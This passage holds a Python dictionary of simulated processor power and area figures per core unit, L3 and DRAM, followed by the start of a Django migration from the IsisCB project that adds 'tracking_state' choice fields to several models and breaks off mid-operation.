'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0584347,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00812226,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0804269,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0600691,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.138862,
'Execution Unit/Register Files/Runtime Dynamic': 0.0681914,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.183864,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.423174,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.80839,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00150827,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00150827,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00133655,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000529892,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000862897,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00521599,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0136451,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.057746,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.67314,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.181378,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.196131,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.06992,
'Instruction Fetch Unit/Runtime Dynamic': 0.454116,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0597128,
'L2/Runtime Dynamic': 0.0114138,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.73199,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.731276,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0483626,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0483625,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.96037,
'Load Store Unit/Runtime Dynamic': 1.01815,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.119254,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.238507,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0423236,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0431333,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.228382,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0299921,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.457196,
'Memory Management Unit/Runtime Dynamic': 0.0731254,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.8464,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.153715,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0106073,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0952269,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.25955,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.62474,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0481763,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.240528,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.256632,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.183432,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.295868,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.149344,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.628644,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.170448,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.6106,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0484832,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00769394,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0738173,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0569014,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.1223,
'Execution Unit/Register Files/Runtime Dynamic': 0.0645954,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.167559,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.390344,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.72949,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00154481,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00154481,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00137578,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000549136,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000817394,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0052828,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0137305,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0547008,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.47944,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.171344,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.185789,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.86682,
'Instruction Fetch Unit/Runtime Dynamic': 0.430847,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0586491,
'L2/Runtime Dynamic': 0.0128165,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.82972,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.779612,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0515243,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0515243,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.07303,
'Load Store Unit/Runtime Dynamic': 1.08524,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.12705,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.2541,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0450905,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0458348,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.216339,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0284937,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.449905,
'Memory Management Unit/Runtime Dynamic': 0.0743286,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.6485,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.127537,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00982803,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0906633,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.228029,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.56075,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 1.954582126807236,
'Runtime Dynamic': 1.954582126807236,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.306278,
'Runtime Dynamic': 0.164718,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 80.318,
'Peak Power': 113.43,
'Runtime Dynamic': 18.9011,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 80.0117,
'Total Cores/Runtime Dynamic': 18.7364,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.306278,
'Total L3s/Runtime Dynamic': 0.164718,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
# isiscb/isisdata/migrations/0062_auto_20170426_1813.py (repo: bgopalachary/IsisCB, license: MIT)
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-04-26 18:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('isisdata', '0061_auto_20170324_1929'),
]
operations = [
migrations.AddField(
model_name='authority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='citation',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='historicalauthority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='historicalcitation',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update')], max_length=2, null=True),
),
migrations.AddField(
model_name='historicalperson',
name='tracking_state',
